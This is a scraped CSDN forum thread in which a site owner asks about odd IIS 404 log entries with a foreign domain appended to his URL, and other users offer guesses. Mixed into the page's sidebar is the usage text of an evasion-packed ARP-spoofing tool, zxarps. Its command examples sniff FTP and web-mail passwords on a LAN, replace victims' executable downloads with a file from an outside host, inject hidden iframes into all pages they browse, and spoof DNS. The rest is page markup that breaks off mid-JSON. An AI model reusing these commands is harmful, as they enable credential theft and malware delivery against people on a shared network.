关于url后跟一个陌生的域名的问题

startray 2008-11-03 02:32:42
我有一个网站,在目录devl下有一个文件,经常访问它 http://www.xxxx.com/devl/a.aspx?a=1&b=2 这样的.
但我今天检查日志发现在IISlog日志中有这样的一个访问记录:报404错误. http://www.xxxx.com/devl/www.hao58.cn 后面这个www.hao58.cn这样网站与我的url没关系.我也不知道怎么会出现这样的呢?这是什么意思?怎么出现这样的访问?在IIS日志里还不少这样的.


谢谢各位.
...全文
132 16 打赏 收藏 转发到动态 举报
写回复
用AI写文章
16 条回复
切换为时间正序
请发表友善的回复…
发表回复
startray 2008-11-07
  • 打赏
  • 举报
回复
up
startray 2008-11-05
  • 打赏
  • 举报
回复
第一个不是程序错。并且我也不会response.redirect 到一个以前从来不知道的网站去


不同的网站,IP也是不同的。
xiaoks668 2008-11-04
  • 打赏
  • 举报
回复
也许与服务商的DNS劫持有关,后面跟的那个网站的地址,是不是经常变? 你把网址记下了,PING一下,看看是不是都是同一个地方的?
Jack123 2008-11-04
  • 打赏
  • 举报
回复
原因:程序有错误,被catch,然后response.redirect了。
startray 2008-11-03
  • 打赏
  • 举报
回复
up
startray 2008-11-03
  • 打赏
  • 举报
回复
up
startray 2008-11-03
  • 打赏
  • 举报
回复
什么情况下会留有这种访问痕迹?
你们查过自已的网站没有,有没有发现过这样的事情?
startray 2008-11-03
  • 打赏
  • 举报
回复
............
不知.....这是什么意思?有时有,有时没有
hotit 2008-11-03
  • 打赏
  • 举报
回复


不太清楚

是不是访问者留下的
gdf2627 2008-11-03
  • 打赏
  • 举报
回复
不会是中了木马吧?
startray 2008-11-03
  • 打赏
  • 举报
回复
[Quote=引用 3 楼 CloneCenter 的回复:]
这个是别人访问你的网站留下来的日志,你怎么能控制别人如何访问你呢?
[/Quote]

别人访问我的网站?不明白.那怎么会在我的url后面直接跟一个它的网站url呢?
我访问你的网站,也不可能留下我的网站吧?
例sohu访问sina,会留下:http://www.sina.com/ wwww.sohu.com 这样奇怪的访问url?并且iis还报了个404错,这明显是到我的服务器访问这样的一个url,没有然后报的错吧?
hawaiiboys 2008-11-03
  • 打赏
  • 举报
回复
Jack123 2008-11-03
  • 打赏
  • 举报
回复
IIS Server 有其他程序。
CloneCenter 2008-11-03
  • 打赏
  • 举报
回复
这个是别人访问你的网站留下来的日志,你怎么能控制别人如何访问你呢?
startray 2008-11-03
  • 打赏
  • 举报
回复
没有人帮忙解释一下吗?
startray 2008-11-03
  • 打赏
  • 举报
回复
up
zxarps免杀版 -idx [index] 网卡索引号 -ip [ip] 欺骗的IP,用'-'指定范围,','隔开 -sethost [ip] 默认是网关,可以指定别的IP -port [port] 关注的端口,用'-'指定范围,','隔开,没指定默认关注所有端口 -reset 恢复目标机的ARP表 -hostname 探测主机时获取主机名信息 -logfilter [string]设置保存数据的条件,必须+-_做前缀,后跟关键字, ','隔开关键字,多个条件'|'隔开 所有带+前缀的关键字都出现的包则写入文件 带-前缀的关键字出现的包不写入文件 带_前缀的关键字一个符合则写入文件(如有+-条件也要符合) -save_a [filename] 将捕捉到的数据写入文件 ACSII模式 -save_h [filename] HEX模式 -hacksite [ip] 指定要插入代码的站点域名或IP, 多个可用','隔开,没指定则影响所有站点 -insert [html code]指定要插入html代码 -postfix [string] 关注的后缀名,只关注HTTP/1.1 302 -hackURL [url] 发现关注的后缀名后修改URL到新的URL -filename [name] 新URL上有效的资源文件名 -hackdns [string] DNS欺骗,只修改UDP的报文,多个可用','隔开 格式: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1 -Interval [ms] 定时欺骗的时间间隔,默认是3秒 -spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者 -speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB example: 嗅探指定的IP段中端口80的数据,并以HEX模式写入文件 zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log FTP嗅探,在21或2121端口中出现USER或PASS的数据包记录到文件 zxarps.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log HTTP web邮箱登陆或一些论坛登陆的嗅探,根据情况自行改关键字 zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -save_a sniff.log 用|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探 zxarps.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log 如果嗅探到目标下载文件后缀是exe等则更改Location:为http://xx.net/test.exe zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe 指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun" 指定的IP段中的用户访问的所有网站都插入<em>一个</em>框架代码 zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<8))e src='xx' width=0 height=0>" 指定的两个IP的总带宽限制到20KB zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20 DNS欺骗 zxarps.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -hackdns "www.aa.com|222.22.2.2,www.bb.com|1.1.1.1"</a></div><div data-report-view="{&quot;mod&quot;:&quot;popu_645&quot;,&quot;index&quot;:&quot;4&quot;,&quot;dest&quot;:&quot;https://blog.csdn.net/qq_35616296/article/details/106560550&quot;,&quot;strategy&quot;:&quot;2~default~OPENSEARCH~Rate&quot;,&quot;extra&quot;:&quot;{\&quot;utm_medium\&quot;:\&quot;distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-4-106560550-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\&quot;,\&quot;dist_request_id\&quot;:\&quot;1714135464422_22198\&quot;}&quot;,&quot;spm&quot;:&quot;1035.2023.3001.6557&quot;}" class="list-item" data-v-ca2d15ac><div class="recommend-title" data-v-ca2d15ac><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAAXNSR0IArs4c6QAAAeZJREFUWEdjZGBgYPhQkSn49/v/EAbG/2oM/xn4QWI0A4wMHxn+M95i5mRcI9Ax/T0jyPI/P/7VM/5n4KKZpVgM/s/I8I2Fg6mR8W1+RioDw39TelqOsIvxNOPbgvRumgc7Lt8xMnxkfJufPmtgfA+xddQBeEOAv7opgImHh5PoKPr169fnOdN3/Xn88DOxevA6QLC9L5KRk4uHWMNA6v59+fz50+TeTf9evvhGjD6qOwDsiI8fPnya2LX537t3Pwg5giYOADvi3Zs3nyZ0bfn36dNvfI6gmQNAlv599fLlxwmd2xi+ffuDsyjAVw6QkwbQLfr76MHDj30duwbMAf+/f/vyvrJoOcUO+Pf82dOv2zadIZSoQPLcXn4mTJJS0iA21Rzw+/6de58n9uwlxgG8+SXOrIoqSlR1ADEWY1NDtRBg+PXrx7+PHz4S4xAmfgF+BjY2DqqGwIBHwb/3797+unzhFjEhwKZroMYkKCRM1RAgxmKapoF/r1+9/HHs8GVslrCISfCzWVpjbdZRLRHiSwOsugZivMkZ/jQNAYa/f//8//UTe+3GyMTMyMGBtd1AtRAY8DQwIA7gTcuxZuDkABcoZIPvP358njXlKFmVEdmWkqBxMHRMBrhrNuCdU1B0DWT3HACwkGScZb+cwwAAAABJRU5ErkJggg==" alt data-v-ca2d15ac> <a target="_blank" href="https://blog.csdn.net/qq_35616296/article/details/106560550" data-report-click="{&quot;mod&quot;:&quot;popu_645&quot;,&quot;index&quot;:&quot;4&quot;,&quot;dest&quot;:&quot;https://blog.csdn.net/qq_35616296/article/details/106560550&quot;,&quot;strategy&quot;:&quot;2~default~OPENSEARCH~Rate&quot;,&quot;extra&quot;:&quot;{\&quot;utm_medium\&quot;:\&quot;distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-4-106560550-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\&quot;,\&quot;dist_request_id\&quot;:\&quot;1714135464422_22198\&quot;}&quot;,&quot;spm&quot;:&quot;1035.2023.3001.6557&quot;}" data-report-query="spm=1035.2023.3001.6557&amp;utm_medium=distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-4-106560550-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default&amp;depth_1-utm_source=distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-4-106560550-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default" class="title" data-v-ca2d15ac><em>一个</em><em>url</em>请求的流程</a></div> <a target="_blank" href="https://blog.csdn.net/qq_35616296/article/details/106560550" data-report-click="{&quot;mod&quot;:&quot;popu_645&quot;,&quot;index&quot;:&quot;4&quot;,&quot;dest&quot;:&quot;https://blog.csdn.net/qq_35616296/article/details/106560550&quot;,&quot;strategy&quot;:&quot;2~default~OPENSEARCH~Rate&quot;,&quot;extra&quot;:&quot;{\&quot;utm_medium\&quot;:\&quot;distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-4-106560550-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\&quot;,\&quot;dist_request_id\&quot;:\&quot;1714135464422_22198\&quot;}&quot;,&quot;spm&quot;:&quot;1035.2023.3001.6557&quot;}" data-report-query="spm=1035.2023.3001.6557&amp;utm_medium=distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-4-106560550-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default&amp;depth_1-utm_source=distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-4-106560550-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default" class="desc" data-v-ca2d15ac>主要流程 1. <em>域名</em>解析 <em>域名</em>解析就是根据<em>url</em>来获取对应的ip的过程。 浏览器 会首先会去搜索浏览器自身的DNS缓存 , 如果找到了<em>url</em>对应的ip就直接返回 如果浏览器自身的缓存里面没有找到对应的条目,那么浏览器会搜索操作系统自身的DNS缓存,如果找到且没有过期则停止搜索解析到此结束. 如果在OS的DNS缓存里也没找到,那么尝试读取hosts文件(在linux和mac下,hosts在/etc/hosts里) 如果在hosts文件中也没有找到对应的条目,浏览器就会发起<em>一个</em>DNS的系统调用,就会向本地配置</a></div><div data-report-view="{&quot;mod&quot;:&quot;popu_645&quot;,&quot;index&quot;:&quot;5&quot;,&quot;dest&quot;:&quot;https://blog.csdn.net/2201_75856701/article/details/128930279&quot;,&quot;strategy&quot;:&quot;2~default~OPENSEARCH~Rate&quot;,&quot;extra&quot;:&quot;{\&quot;utm_medium\&quot;:\&quot;distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-5-128930279-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\&quot;,\&quot;dist_request_id\&quot;:\&quot;1714135464422_22198\&quot;}&quot;,&quot;spm&quot;:&quot;1035.2023.3001.6557&quot;}" class="list-item" data-v-ca2d15ac><div class="recommend-title" data-v-ca2d15ac><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAAXNSR0IArs4c6QAAAeZJREFUWEdjZGBgYPhQkSn49/v/EAbG/2oM/xn4QWI0A4wMHxn+M95i5mRcI9Ax/T0jyPI/P/7VM/5n4KKZpVgM/s/I8I2Fg6mR8W1+RioDw39TelqOsIvxNOPbgvRumgc7Lt8xMnxkfJufPmtgfA+xddQBeEOAv7opgImHh5PoKPr169fnOdN3/Xn88DOxevA6QLC9L5KRk4uHWMNA6v59+fz50+TeTf9evvhGjD6qOwDsiI8fPnya2LX537t3Pwg5giYOADvi3Zs3nyZ0bfn36dNvfI6gmQNAlv599fLlxwmd2xi+ffuDsyjAVw6QkwbQLfr76MHDj30duwbMAf+/f/vyvrJoOcUO+Pf82dOv2zadIZSoQPLcXn4mTJJS0iA21Rzw+/6de58n9uwlxgG8+SXOrIoqSlR1ADEWY1NDtRBg+PXrx7+PHz4S4xAmfgF+BjY2DqqGwIBHwb/3797+unzhFjEhwKZroMYkKCRM1RAgxmKapoF/r1+9/HHs8GVslrCISfCzWVpjbdZRLRHiSwOsugZivMkZ/jQNAYa/f//8//UTe+3GyMTMyMGBtd1AtRAY8DQwIA7gTcuxZuDkABcoZIPvP358njXlKFmVEdmWkqBxMHRMBrhrNuCdU1B0DWT3HACwkGScZb+cwwAAAABJRU5ErkJggg==" alt data-v-ca2d15ac> <a target="_blank" href="https://blog.csdn.net/2201_75856701/article/details/128930279" data-report-click="{&quot;mod&quot;:&quot;popu_645&quot;,&quot;index&quot;:&quot;5&quot;,&quot;dest&quot;:&quot;https://blog.csdn.net/2201_75856701/article/details/128930279&quot;,&quot;strategy&quot;:&quot;2~default~OPENSEARCH~Rate&quot;,&quot;extra&quot;:&quot;{\&quot;utm_medium\&quot;:\&quot;distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-5-128930279-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\&quot;,\&quot;dist_request_id\&quot;:\&quot;1714135464422_22198\&quot;}&quot;,&quot;spm&quot;:&quot;1035.2023.3001.6557&quot;}" data-report-query="spm=1035.2023.3001.6557&amp;utm_medium=distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-5-128930279-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default&amp;depth_1-utm_source=distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-5-128930279-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default" class="title" data-v-ca2d15ac>安全系列:XXX<em>域名</em>存在<em>URL</em>任意跳转漏洞</a></div> <a target="_blank" href="https://blog.csdn.net/2201_75856701/article/details/128930279" data-report-click="{&quot;mod&quot;:&quot;popu_645&quot;,&quot;index&quot;:&quot;5&quot;,&quot;dest&quot;:&quot;https://blog.csdn.net/2201_75856701/article/details/128930279&quot;,&quot;strategy&quot;:&quot;2~default~OPENSEARCH~Rate&quot;,&quot;extra&quot;:&quot;{\&quot;utm_medium\&quot;:\&quot;distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-5-128930279-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default\&quot;,\&quot;dist_request_id\&quot;:\&quot;1714135464422_22198\&quot;}&quot;,&quot;spm&quot;:&quot;1035.2023.3001.6557&quot;}" data-report-query="spm=1035.2023.3001.6557&amp;utm_medium=distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-5-128930279-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default&amp;depth_1-utm_source=distribute.pc_relevant_bbs_down_v2.none-task-blog-2~default~OPENSEARCH~Rate-5-128930279-bbs-280041857.264^v3^pc_relevant_bbs_down_v2_default" class="desc" data-v-ca2d15ac><em>URL</em>跳转攻击(<em>URL</em> Redirection),Web业务系统接收到用户提交的<em>URL</em>参数后,未对<em>URL</em>参数进行“可信<em>URL</em>”校验,就向用户浏览器返回跳转到该<em>URL</em>。</a></div></div></div></div> <div class="public_pc_right_footer2020" style="display:none;" data-v-4a5a7f56></div></div> <div id="right-floor-user-content_562" data-editor="{&quot;type&quot;:&quot;floor&quot;,&quot;pageId&quot;:143,&quot;floorId&quot;:562}" class="user-right-floor right-box main-box detail-user-right" data-v-229a00b0><div class="__vuescroll" style="height:100%;width:100%;padding:0;position:relative;overflow:hidden;"><div class="__panel __hidebar" style="position:relative;box-sizing:border-box;height:100%;overflow-y:hidden;overflow-x:hidden;transform-origin:;transform:;"><div class="__view" style="position:relative;box-sizing:border-box;min-width:100%;min-height:100%;"><!----><div comp-data="[object Object]" baseInfo="[object Object]" community="[object Object]" class="introduce" data-v-4722a3ae><div class="introduce-title" data-v-4722a3ae><div class="img-info" data-v-4722a3ae><a href="https://bbs.csdn.net/forums/DotNET" class="community-img" data-v-4722a3ae><img src="https://img-community.csdnimg.cn/avatar/745f64491f2744dcbce3cd7127270b93.png?x-oss-process=image/resize,m_fixed,h_88,w_88" alt data-v-4722a3ae> <div title=".NET社区" class="community-name" data-v-4722a3ae> .NET社区 </div></a></div></div> <div class="content" data-v-4722a3ae><div class="detail" data-v-4722a3ae><div title="62046" class="item" data-v-4722a3ae><p class="num" data-v-4722a3ae> 62,046 </p> <p class="desc" data-v-4722a3ae> 社区成员 </p></div> <div title="669049" class="item" data-v-4722a3ae><a href="https://bbs.csdn.net/forums/DotNET" target="_blank" data-v-4722a3ae><p class="num" data-v-4722a3ae> 669,049 </p> <p class="desc" data-v-4722a3ae> 社区内容 </p></a></div></div> <div class="detail-btns" data-v-4722a3ae><div class="community-ctrl-btns_wrapper" data-v-0ebf603c data-v-4722a3ae><div class="community-ctrl-btns" data-v-0ebf603c><div class="community-ctrl-btns_item" data-v-0ebf603c><div data-v-160be461 data-v-0ebf603c><div data-report-click="{&quot;spm&quot;:&quot;3001.5975&quot;}" data-v-160be461><img src="https://csdnimg.cn/release/cmsfe/public/img/topic.427195d5.png" alt="" class="img sendTopic" data-v-160be461 data-v-0ebf603c> <span data-v-160be461 data-v-0ebf603c>发帖</span></div> <!----> <!----></div></div><div class="community-ctrl-btns_item" data-v-0ebf603c><div data-v-0ebf603c><img src="https://csdnimg.cn/release/cmsfe/public/img/me.40a70ab0.png" alt="" class="img me" data-v-0ebf603c> <span data-v-0ebf603c>与我相关</span></div></div><div class="community-ctrl-btns_item" data-v-0ebf603c><div data-v-0ebf603c><img src="https://csdnimg.cn/release/cmsfe/public/img/task.87b52881.png" alt="" class="img task" data-v-0ebf603c> <span data-v-0ebf603c>我的任务</span></div></div><div class="community-ctrl-btns_item" data-v-0ebf603c><div class="community-share" data-v-4ca34db9 data-v-0ebf603c><div class="handle-item share" data-v-ca030a68 data-v-4ca34db9><span height="384" data-v-ca030a68><div role="tooltip" id="el-popover-7513" aria-hidden="true" class="el-popover el-popper popo share-popover" style="width:265px;display:none;"><!----><div id="tool-QRcode" class="QRcode" data-v-ca030a68><img src="https://csdnimg.cn/release/cmsfe/public/img/shareBg5.9eaaa691.png" alt="" class="share-bg" data-v-ca030a68> <div class="share-bg-box" data-v-ca030a68><div class="share-content" data-v-ca030a68><img src="https://img-community.csdnimg.cn/avatar/745f64491f2744dcbce3cd7127270b93.png?x-oss-process=image/resize,m_fixed,h_88,w_88" alt="" class="share-avatar" data-v-ca030a68> <div class="share-tit" data-v-ca030a68>.NET社区</div> <div class="share-dec" data-v-ca030a68>.NET技术交流专区</div> <span class="copy-share-url" data-v-ca030a68>复制链接</span> <div class="shareText" data-v-ca030a68> </div></div> <div class="share-code" data-v-ca030a68><div class="qrcode" data-v-ca030a68></div> <div class="share-code-text" data-v-ca030a68>扫一扫</div></div></div></div> </div><span class="el-popover__reference-wrapper"><div data-v-0ebf603c><img src="https://csdnimg.cn/release/cmsfe/public/img/share-circle.3e0b7822.png" alt="" class="img share" data-v-0ebf603c> <span data-v-0ebf603c>分享</span></div></span></span></div> <!----></div></div></div> <!----> <div data-v-4fb59baf data-v-0ebf603c><div class="el-dialog__wrapper ccloud-pop-outer2" style="display:none;" data-v-4fb59baf><div role="dialog" aria-modal="true" aria-label="dialog" class="el-dialog el-dialog--center" style="margin-top:15vh;width:70%;"><div class="el-dialog__header"><span class="el-dialog__title"></span><!----></div><!----><div class="el-dialog__footer"><span class="dialog-footer clearfix" data-v-4fb59baf><div class="confirm-btm fr" data-v-4fb59baf>确定</div></span></div></div></div></div></div></div></div> <div style="display:none;" data-v-4722a3ae data-v-4722a3ae><!----> <div class="introduce-desc" data-v-4722a3ae><div class="introduce-desc-title" data-v-4722a3ae>社区描述</div> <span data-v-4722a3ae> .NET技术交流专区 </span></div></div> <div class="introduce-text" data-v-4722a3ae><div class="label-box" data-v-4722a3ae><span class="label" data-v-4722a3ae>javascript</span><span class="label" data-v-4722a3ae>云原生</span> <span class="label" data-v-4722a3ae>企业社区</span> <!----></div></div> <!----> <div class="manage" data-v-4722a3ae><div class="manage-inner" data-v-4722a3ae><span data-v-4722a3ae>社区管理员</span> <ul data-v-4722a3ae><li data-v-4722a3ae><a href="https://blog.csdn.net/community_93" target="_blank" class="start-img" data-v-4722a3ae><img src="https://profile-avatar.csdnimg.cn/default.jpg!1" alt="ASP.NET" class="el-tooltip item" data-v-4722a3ae data-v-4722a3ae></a></li><li data-v-4722a3ae><a href="https://blog.csdn.net/dotnetconf" target="_blank" class="start-img" data-v-4722a3ae><img src="https://profile-avatar.csdnimg.cn/default.jpg!1" alt=".Net开发者社区" class="el-tooltip item" data-v-4722a3ae data-v-4722a3ae></a></li><li data-v-4722a3ae><a href="https://blog.csdn.net/weixin_41960540" target="_blank" class="start-img" data-v-4722a3ae><img src="https://profile-avatar.csdnimg.cn/aa17748a52c84d88ba031f9895a4ea32_weixin_41960540.jpg!1" alt="R小R" class="el-tooltip item" data-v-4722a3ae data-v-4722a3ae></a></li></ul></div></div> <div class="actions" data-v-4722a3ae><!----> <div style="flex:1;" data-v-4722a3ae><div class="join-btn" data-v-4722a3ae> 加入社区 </div></div> <!----> <!----></div> <div class="el-dialog__wrapper" style="display:none;" data-v-38c57799 data-v-4722a3ae><div role="dialog" aria-modal="true" aria-label="获取链接或二维码" class="el-dialog join-qrcode-dialog" style="margin-top:15vh;width:600px;"><div class="el-dialog__header"><span class="el-dialog__title">获取链接或二维码</span><button type="button" aria-label="Close" class="el-dialog__headerbtn"><i class="el-dialog__close el-icon el-icon-close"></i></button></div><!----><div class="el-dialog__footer"><span class="dialog-footer" data-v-38c57799></span></div></div></div> <div class="collapse-btn" data-v-4722a3ae><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFAAAAAgCAYAAACFM/9sAAAAAXNSR0IArs4c6QAAAi1JREFUaEPtl01u01AUhc+N8wMSO4AxzJAqwQpKQsdtbMOICmKnwCKQ2ACDIgotrYKiduIiVZ10B0CBAjtAbICfooomJr3IcUoTiVLb15GNuG/67nm65/M5AxP0iAiQSK1iKEBhCBSgAhQSEMo1gQpQSEAo1wQqQCEBoVwT+K8CnLnWvER8cOHMaf95q9Xaj+vDtp3LPeD83u6p9a2t+U5cfVrzmSTQNOfOgg4+ATDAeNHp/Jza3Fz5HtWUZbl3GXjYn2e+53lL96Nq057LBOD0dOOcUSx8BFAcGHpZLlWmVlfnd08yaJrubRAe/Z77HwEG5kdS1E8StgFc9bzFb8dBrNtukxgLwOAXNEF6T/pAce8zSeDhknXbuUNMQRUHe/BrMNX+BNGyHIdBT45m6VVn36/FqX5cOFHmMwUYJrE5x+CgkuEujLe+361ubLS+HhowzeYtEC8NzWyXy5ValMpHgSCZyRxgsLxpui4Ij4/ShZ1S0aiurS18sSznJoOeDt29AaP6t6pLgMTV5gJgsHTddhvEWBwC9Y6AZww8AFA4Lp1xDac9nxuAYZ37aQuqGgIbPTt+t3tluNppw0jyXq4AhnV2ZkG0PAKR8b5UMiaDSicxOU5N7gCGSXRvMLAygPgB3Jv0vOXP4wSR9O1cAgzMzFxvXDR6hYlK5cd6u93eS2pw3LrcAhy38bTeV4BCkgpQAQoJCOWaQAUoJCCUawIVoJCAUK4JVIBCAkL5L1yapyGdIBwvAAAAAElFTkSuQmCC" alt data-v-4722a3ae></div></div><!----><!----><div comp-data="[object Object]" baseInfo="[object Object]" typePage="detail" community="[object Object]" class="floor-user-right-rank" data-v-3d3affee><div class="el-tabs el-tabs--top" data-v-3d3affee><div class="el-tabs__header is-top"><div class="el-tabs__nav-wrap is-top"><div class="el-tabs__nav-scroll"><div role="tablist" class="el-tabs__nav is-top" style="transform:translateX(-0px);"><div class="el-tabs__active-bar is-top" style="width:0px;transform:translateX(0px);ms-transform:translateX(0px);webkit-transform:translateX(0px);"></div></div></div></div></div><div class="el-tabs__content"><div role="tabpanel" id="pane-integral" aria-labelledby="tab-integral" class="el-tab-pane" data-v-3d3affee></div><div role="tabpanel" aria-hidden="true" id="pane-3" aria-labelledby="tab-3" class="el-tab-pane" style="display:none;" data-v-3d3affee></div><div role="tabpanel" aria-hidden="true" id="pane-5" aria-labelledby="tab-5" class="el-tab-pane" style="display:none;" data-v-3d3affee></div><div role="tabpanel" aria-hidden="true" id="pane-6" aria-labelledby="tab-6" class="el-tab-pane" style="display:none;" data-v-3d3affee></div></div></div> <div class="floor-user-right-rank-score" data-v-608528ce data-v-3d3affee><div class="floor-user-right-rank-score-tabs" data-v-608528ce><ul data-v-608528ce><li data-v-608528ce> 近7日 </li><li data-v-608528ce> 近30日 </li><li class="active" data-v-608528ce> 至今 </li></ul></div> <div class="floor-user-right-rank-common" data-v-46cf600d data-v-608528ce><div class="rank-list" data-v-46cf600d><!----> <div class="no-data loading" data-v-46cf600d><i class="el-icon-loading" data-v-46cf600d></i> <p data-v-46cf600d>加载中</p></div> <!----> <a href="https:///DotNET/rank/list/total" target="_blank" class="show-more" data-v-46cf600d> 查看更多榜单 </a></div></div></div></div><div comp-data="[object Object]" baseInfo="[object Object]" typePage="detail" community="[object Object]" class="floor comunity-rule" data-v-3cfa4dbd><div class="title" data-v-3cfa4dbd> 社区公告 </div> <div class="contain" data-v-3cfa4dbd><div class="inner-content" data-v-3cfa4dbd><p>.NET 社区是一个围绕开源 .NET 的开放、热情、创新、包容的技术社区。社区致力于为广大 .NET 爱好者提供一个良好的知识共享、协同互助的 .NET 技术交流环境。我们尊重不同意见&#xff0c;支持健康理性的辩论和互动&#xff0c;反对歧视和攻击。</p> <p>希望和大家一起共同营造一个活跃、友好的社区氛围。</p> </div></div></div><div comp-data="[object Object]" baseInfo="[object Object]" typePage="detail" community="[object Object]" class="user-right-adimg empty-arr" data-v-15c6aa4f><div class="adImgs" data-v-2a6389b9 data-v-15c6aa4f><!----> <div data-v-2a6389b9><!----></div></div></div><div comp-data="[object Object]" baseInfo="[object Object]" community="[object Object]" class="content-right-recommend" data-v-0f781e88><div data-v-3798762e data-v-0f781e88><!----> <!----></div></div><div comp-data="[object Object]" baseInfo="[object Object]" typePage="detail" community="[object Object]" class="ai-entrance" data-v-eb1c454c><p data-v-eb1c454c>试试用AI创作助手写篇文章吧</p> <div class="entrance-btn-line" data-v-eb1c454c><a href="https://mp.csdn.net/edit?guide=1" target="_blank" data-report-click="{&quot;spm&quot;:&quot;3001.9712&quot;}" data-report-query="spm=3001.9712" class="entrance-btn" data-v-eb1c454c>+ 用AI写文章</a></div></div></div></div></div></div></div></div></div></div></div></div></div> <div> <script type="text/javascript" src="https://g.csdnimg.cn/common/csdn-footer/csdn-footer.js" data-isfootertrack="false" defer></script> </div></div></div><script> window.__INITIAL_STATE__= {"csrf":"Jbd0cZRY-npZoKP70c0O6cn504Yl8O5OfFjQ","origin":"http:\u002F\u002Fbbs.csdn.net","isMobile":false,"cookie":"uuid_tt_dd=10_597721090-1714135464372-760599;","ip":"3.144.12.205","pageData":{"page":{"pageId":143,"title":"社区详情","keywords":"社区详情","description":"社区详情","ext":{"isMd":"true","armsfe1":"{pid:\"dyiaei5ihw@1a348e4d05c2c78\",appType:\"web\",imgUrl:\"https:\u002F\u002Farms-retcode.aliyuncs.com\u002Fr.png?\",sendResource:true,enableLinkTrace:true,behavior:true}","redPacketCfg":"{\"presetTitle\":[\"成就一亿技术人!\",\"大吉大利\",\"节日快乐\",\"Bug Free\",\"Hello World\",\"Be Greater Than Average!!\"],\"defaultTitle\":\"成就一亿技术人!\",\"preOpenSty\":{},\"redCardSty\":{}}","blogStar":"[{\"year\":\"2021\",\"enable\":true,\"communityIds\":[3859],\"url\":\"https:\u002F\u002Fbbs.csdn.net\u002Fsummary2021\"},{\"year\":\"2022\",\"enable\":true,\"communityIds\":[3860],\"url\":\"https:\u002F\u002Fbbs.csdn.net\u002Fsummary2022\"}]","mdVersion":"https:\u002F\u002Fcsdnimg.cn\u002Frelease\u002Fmarkdown-editor\u002F1.1.0\u002Fmarkdown-editor.js","componentSortCfg":"{ \"right\":[\"ratesInfo\",\"cty-profile\",\"pub-comp\",\"user-right-introduce\",\"post-event\",\"my-mission\",\"user-recommend\",\"user-right-rank\",\"user-right-rule\",\"user-right-adimg\"] }","show_1024":"{\"enable\":false,\"useWhitelist\":false,\"whitelist\":[76215],\"home\":\"https:\u002F\u002F1111.csdn.net\u002F\",\"logo\":\"https:\u002F\u002Fimg-home.csdnimg.cn\u002Fimages\u002F20221104102741.png\",\"hideLive\":true}","iframes":"[\"3859\"]","pageCfg":"{\"disableDownloadPDF\": false,\"hideSponsor\":false}"}},"template":{"templateId":71,"templateComponentName":"ccloud-detail","title":"ccloud-detail","floorList":[{"floorId":562,"floorComponentName":"floor-user-content","title":"社区详情页","description":"社区详情页","indexOrder":3,"componentList":[{"componentName":"baseInfo","componentDataId":"cloud-detail1","componentConfigData":{},"relationType":3},{"componentName":"user-right-introduce","componentDataId":"","componentConfigData":{},"relationType":2},{"componentName":"user-recommend","componentDataId":"","componentConfigData":{},"relationType":2},{"componentName":"user-right-rank","componentDataId":"","componentConfigData":{},"relationType":2},{"componentName":"user-right-rule","componentDataId":"","componentConfigData":{},"relationType":2},{"componentName":"user-right-adimg","componentDataId":"","componentConfigData":{},"relationType":2},{"componentName":"default2014LiveRoom","componentDataId":"20221024DefaultLiveRoom","componentConfigData":{},"relationType":3}]}]},"data":{"baseInfo":{"customDomain":"","uriName":"DotNET","communityHomePage":"https:\u002F\u002Fbbs.csdn.net\u002Fforums\u002FDotNET","owner":{"userName":"community_93","nickName":"ASP.NET","avatarUrl":"https:\u002F\u002F